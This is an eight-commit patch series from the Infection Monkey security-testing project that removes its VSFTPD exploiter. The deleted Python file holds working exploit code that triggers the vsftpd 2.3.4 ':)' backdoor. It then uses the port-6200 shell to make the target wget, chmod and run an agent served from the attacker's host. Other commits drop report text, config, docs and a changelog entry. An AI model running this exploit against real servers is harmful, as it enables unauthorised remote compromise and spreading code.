From 40b9b5b730b4db5d67af9a2f854c90a374e33ed1 Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Fri, 29 Oct 2021 17:57:12 +0530 Subject: [PATCH 1/8] Agent: Remove VSFTPD exploiter --- monkey/infection_monkey/example.conf | 1 - monkey/infection_monkey/exploit/vsftpd.py | 166 ---------------------- 2 files changed, 167 deletions(-) delete mode 100644 monkey/infection_monkey/exploit/vsftpd.py diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf index e5ce947c9..d9acee9ed 100644 --- a/monkey/infection_monkey/example.conf +++ b/monkey/infection_monkey/example.conf @@ -39,7 +39,6 @@ "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter", - "VSFTPDExploiter", "MSSQLExploiter" ], "finger_classes": [ diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py deleted file mode 100644 index 42c7c052f..000000000 --- a/monkey/infection_monkey/exploit/vsftpd.py +++ /dev/null @@ -1,166 +0,0 @@ -""" - Implementation is based on VSFTPD v2.3.4 Backdoor Command Execution exploit by metasploit - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp - /vsftpd_234_backdoor.rb - only vulnerable version is "2.3.4" -""" - -import socket -import time -from logging import getLogger - -from common.utils.attack_utils import ScanStatus -from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey -from infection_monkey.exploit.tools.http_tools import HTTPTools -from infection_monkey.model import ( - CHMOD_MONKEY, - DOWNLOAD_TIMEOUT, - MONKEY_ARG, - RUN_MONKEY, - WGET_HTTP_UPLOAD, -) -from infection_monkey.telemetry.attack.t1222_telem import T1222Telem -from infection_monkey.utils.commands import build_monkey_commandline - -logger = getLogger(__name__) - - -FTP_PORT = 21 # port at which vsftpd runs -BACKDOOR_PORT = 6200 # backdoor port -RECV_128 = 128 # In Bytes -UNAME_M = "uname -m" -ULIMIT_V = "ulimit -v " # To increase the memory limit -UNLIMITED = "unlimited;" -USERNAME = b"USER D3fa1t:)" # Ftp Username should end with :) to trigger the backdoor -PASSWORD = b"PASS please" # Ftp Password -FTP_TIME_BUFFER = 1 # In seconds - - -class VSFTPDExploiter(HostExploiter): - _TARGET_OS_TYPE = ["linux"] - _EXPLOITED_SERVICE = "VSFTPD" - - def __init__(self, host): - self._update_timestamp = 0 - super(VSFTPDExploiter, self).__init__(host) - self.skip_exist = self._config.skip_exploit_if_file_exist - - def socket_connect(self, s, ip_addr, port): - try: - s.connect((ip_addr, port)) - return True - except socket.error as e: - logger.info("Failed to connect to %s: %s", self.host.ip_addr, str(e)) - return False - - def socket_send_recv(self, s, message): - try: - s.send(message) - return s.recv(RECV_128).decode("utf-8") - except socket.error as e: - logger.info("Failed to send payload to %s: %s", self.host.ip_addr, str(e)) - return False - - def socket_send(self, s, message): - try: - s.send(message) - return True - except socket.error as e: - logger.info("Failed to send payload to %s: %s", self.host.ip_addr, str(e)) - return False - - def _exploit_host(self): - logger.info("Attempting to trigger the Backdoor..") - ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - - if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT): - ftp_socket.recv(RECV_128).decode("utf-8") - - if self.socket_send_recv(ftp_socket, USERNAME + b"\n"): - time.sleep(FTP_TIME_BUFFER) - self.socket_send(ftp_socket, PASSWORD + b"\n") - ftp_socket.close() - logger.info("Backdoor Enabled, Now we can run commands") - else: - logger.error("Failed to trigger backdoor on %s", self.host.ip_addr) - return False - - logger.info("Attempting to connect to backdoor...") - backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - - if self.socket_connect(backdoor_socket, self.host.ip_addr, BACKDOOR_PORT): - logger.info("Connected to backdoor on %s:6200", self.host.ip_addr) - - uname_m = str.encode(UNAME_M + "\n") - response = self.socket_send_recv(backdoor_socket, uname_m) - - if response: - logger.info("Response for uname -m: %s", response) - if "" != response.lower().strip(): - # command execution is successful - self.host.os["machine"] = response.lower().strip() - self.host.os["type"] = "linux" - else: - logger.info("Failed to execute command uname -m on victim %r ", self.host) - - src_path = get_target_monkey(self.host) - logger.info("src for suitable monkey executable for host %r is %s", self.host, src_path) - - if not src_path: - logger.info("Can't find suitable monkey executable for host %r", self.host) - return False - - # Create a http server to host the monkey - http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path) - dropper_target_path_linux = self._config.dropper_target_path_linux - logger.info("Download link for monkey is %s", http_path) - - # Upload the monkey to the machine - monkey_path = dropper_target_path_linux - download_command = WGET_HTTP_UPLOAD % {"monkey_path": monkey_path, "http_path": http_path} - download_command = str.encode(str(download_command) + "\n") - logger.info("Download command is %s", download_command) - if self.socket_send(backdoor_socket, download_command): - logger.info("Monkey is now Downloaded ") - else: - logger.error("Failed to download monkey at %s", self.host.ip_addr) - return False - - http_thread.join(DOWNLOAD_TIMEOUT) - http_thread.stop() - - # Change permissions - change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path} - change_permission = str.encode(str(change_permission) + "\n") - logger.info("change_permission command is %s", change_permission) - backdoor_socket.send(change_permission) - T1222Telem(ScanStatus.USED, change_permission.decode(), self.host).send() - - # Run monkey on the machine - parameters = build_monkey_commandline( - self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT - ) - run_monkey = RUN_MONKEY % { - "monkey_path": monkey_path, - "monkey_type": MONKEY_ARG, - "parameters": parameters, - } - - # Set unlimited to memory - # we don't have to revert the ulimit because it just applies to the shell obtained by our - # exploit - run_monkey = ULIMIT_V + UNLIMITED + " " + run_monkey - run_monkey = str.encode(str(run_monkey) + "\n") - time.sleep(FTP_TIME_BUFFER) - if backdoor_socket.send(run_monkey): - logger.info( - "Executed monkey '%s' on remote victim %r (cmdline=%r)", - self._config.dropper_target_path_linux, - self.host, - run_monkey, - ) - self.add_executed_cmd(run_monkey.decode()) - return True - else: - return False From 97c50c3caa8b36f0b93bd1fbdf8a219fdb7ad519 Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Fri, 29 Oct 2021 18:12:06 +0530 Subject: [PATCH 2/8] UI: Remove components related to the VSFTPD exploiter --- .../report-components/SecurityReport.js | 6 ---- .../security/issues/VsftpdIssue.js | 36 ------------------- 2 files changed, 42 deletions(-) delete mode 100644 monkey/monkey_island/cc/ui/src/components/report-components/security/issues/VsftpdIssue.js diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js index 3dcf94615..c8b46c2bf 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js @@ -25,7 +25,6 @@ import {webLogicIssueOverview, webLogicIssueReport} from './security/issues/WebL import {hadoopIssueOverview, hadoopIssueReport} from './security/issues/HadoopIssue'; import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue'; import {drupalIssueOverview, drupalIssueReport} from './security/issues/DrupalIssue'; -import {vsftpdIssueOverview, vsftpdIssueReport} from './security/issues/VsftpdIssue'; import {wmiPasswordIssueReport, wmiPthIssueReport} from './security/issues/WmiIssue'; import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues/SshIssue'; import {sambacryIssueOverview, sambacryIssueReport} from './security/issues/SambacryIssue'; @@ -108,11 +107,6 @@ class ReportPageComponent extends AuthComponent { [this.issueContentTypes.REPORT]: drupalIssueReport, [this.issueContentTypes.TYPE]: this.issueTypes.DANGER }, - 'VSFTPDExploiter': { - [this.issueContentTypes.OVERVIEW]: vsftpdIssueOverview, - [this.issueContentTypes.REPORT]: vsftpdIssueReport, - [this.issueContentTypes.TYPE]: this.issueTypes.DANGER - }, 'WmiExploiter': { [this.issueContentTypes.REPORT]: { [this.credentialTypes.PASSWORD]: wmiPasswordIssueReport, diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/VsftpdIssue.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/VsftpdIssue.js deleted file mode 100644 index e5419a9c2..000000000 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/VsftpdIssue.js +++ /dev/null @@ -1,36 +0,0 @@ -import React from 'react'; -import CollapsibleWellComponent from '../CollapsibleWell'; - -export function vsftpdIssueOverview() { - return (
  • VSFTPD is vulnerable to CVE-2011-2523. -
    • ) -} - -export function vsftpdIssueReport(issue) { - return ( - <> - Update your VSFTPD server to the latest version vsftpd-3.0.3. - - The machine {issue.machine} ({issue.ip_address}) has a backdoor running at - port 6200. -
    - The attack was made possible because the VSFTPD server was not patched against CVE-2011-2523. -

    In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been - compromised. - Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a - command - shell on port 6200. -

    - The Monkey executed commands by first logging in with ":)" in the username and then sending commands to the - backdoor - at port 6200. -

    Read more about the security issue and remediation here. -     - - ); -} From 3f19c0bb3c13459ac41332a926f3fd73cf54ed24 Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Fri, 29 Oct 2021 18:12:40 +0530 Subject: [PATCH 3/8] Island: Remove config and reporting stuff related to the VSFTPD exploiter --- monkey/monkey_island/cc/services/config_schema/basic.py | 1 - .../config_schema/definitions/exploiter_classes.py | 9 --------- .../exploit_processing/exploiter_descriptor_enum.py | 3 --- 3 files changed, 13 deletions(-) diff --git a/monkey/monkey_island/cc/services/config_schema/basic.py b/monkey/monkey_island/cc/services/config_schema/basic.py index 6608cac2c..b822c98ea 100644 --- a/monkey/monkey_island/cc/services/config_schema/basic.py +++ b/monkey/monkey_island/cc/services/config_schema/basic.py @@ -23,7 +23,6 @@ BASIC = { "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter", - "VSFTPDExploiter", "MSSQLExploiter", "DrupalExploiter", "PowerShellExploiter", diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py index 85cc09014..348deb255 100644 --- a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py +++ b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py @@ -120,15 +120,6 @@ EXPLOITER_CLASSES = { "https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn.", "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/hadoop/", }, - { - "type": "string", - "enum": ["VSFTPDExploiter"], - "title": "VSFTPD Exploiter", - "safe": True, - "info": "Exploits a malicious backdoor that was added to the VSFTPD download archive. " - "Logic based on Metasploit module.", - "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/vsftpd/", - }, { "type": "string", "enum": ["DrupalExploiter"], diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py index 15e1bfef4..932243c33 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py @@ -42,9 +42,6 @@ class ExploiterDescriptorEnum(Enum): ) HADOOP = ExploiterDescriptor("HadoopExploiter", "Hadoop/Yarn Exploiter", ExploitProcessor) MSSQL = ExploiterDescriptor("MSSQLExploiter", "MSSQL Exploiter", ExploitProcessor) - VSFTPD = ExploiterDescriptor( - "VSFTPDExploiter", "VSFTPD Backdoor Exploiter", CredExploitProcessor - ) DRUPAL = ExploiterDescriptor("DrupalExploiter", "Drupal Server Exploiter", ExploitProcessor) ZEROLOGON = ExploiterDescriptor( "ZerologonExploiter", "Zerologon Exploiter", ZerologonExploitProcessor From ee79ea0a9def55d3e2d85e1913a887d91f6ea65b Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Fri, 29 Oct 2021 18:15:38 +0530 Subject: [PATCH 4/8] Project: Remove variable 'VSFTPD' from Vulture's allowlist --- vulture_allowlist.py | 1 - 1 file changed, 1 deletion(-) diff --git a/vulture_allowlist.py b/vulture_allowlist.py index bab90e90d..68e28d4be 100644 --- a/vulture_allowlist.py +++ b/vulture_allowlist.py @@ -63,7 +63,6 @@ STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_pro WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40) HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43) MSSQL # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:44) -VSFTPD # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:45) DRUPAL # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:48) POWERSHELL # (\monkey\monkey_island\cc\services\reporting\issue_processing\exploit_processing\exploiter_descriptor_enum.py:52) _.do_POST # unused method (monkey/monkey_island/cc/server_utils/bootloader_server.py:26) From b005946d882d2849f02213fea12ce9847ad1f57c Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Fri, 29 Oct 2021 18:17:33 +0530 Subject: [PATCH 5/8] BB: Remove VSFTPD exploiter from BB performance test's config template --- envs/monkey_zoo/blackbox/config_templates/performance.py | 1 - 1 file changed, 1 deletion(-) diff --git a/envs/monkey_zoo/blackbox/config_templates/performance.py b/envs/monkey_zoo/blackbox/config_templates/performance.py index 2662642e6..ccc073197 100644 --- a/envs/monkey_zoo/blackbox/config_templates/performance.py +++ b/envs/monkey_zoo/blackbox/config_templates/performance.py @@ -22,7 +22,6 @@ class Performance(ConfigTemplate): "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter", - "VSFTPDExploiter", "MSSQLExploiter", "PowerShellExploiter", "ZerologonExploiter", From c6cbaca75b49e9f704e438e8a1a5b30cf7c74dd0 Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Fri, 29 Oct 2021 18:19:25 +0530 Subject: [PATCH 6/8] UT: Remove VSFTPD exploiter from unit tests' data - standard monkey config --- .../data_for_tests/monkey_configs/monkey_config_standard.json | 1 - 1 file changed, 1 deletion(-) diff --git a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json index 70176d94a..c1857c639 100644 --- a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json +++ b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json @@ -11,7 +11,6 @@ "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter", - "VSFTPDExploiter", "MSSQLExploiter", "DrupalExploiter" ] From 455a8f2680573918e378bd3240db24a7357fe6a4 Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Fri, 29 Oct 2021 18:20:12 +0530 Subject: [PATCH 7/8] Docs: Remove VSFTPD exploiter from the docs --- docs/content/reference/exploiters/VSFTPD.md | 9 --------- 1 file changed, 9 deletions(-) delete mode 100644 docs/content/reference/exploiters/VSFTPD.md diff --git a/docs/content/reference/exploiters/VSFTPD.md b/docs/content/reference/exploiters/VSFTPD.md deleted file mode 100644 index 32b3ad96f..000000000 --- a/docs/content/reference/exploiters/VSFTPD.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -title: "VSFTPD" -date: 2020-07-14T08:42:39+03:00 -draft: false -tags: ["exploit", "linux"] ---- -### Description - -This exploits a malicious backdoor that was added to the VSFTPD download archive. The logic is based on [this MetaSploit module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb). From 779ae79499ac7acf3d42dd8d2a5a0d0d16ec16a7 Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Fri, 29 Oct 2021 18:24:23 +0530 Subject: [PATCH 8/8] Changelog: Add entry for removing the VSFTPD exploiter --- CHANGELOG.md | 1 + 1 file changed, 1 insertion(+) diff --git a/CHANGELOG.md b/CHANGELOG.md index 18a655320..4eb1f0c42 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -11,6 +11,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/). ### Changed ### Removed +- The VSFTPD exploiter. #1533 ### Fixed - A bug in network map page that caused delay of telemetry log loading. #1545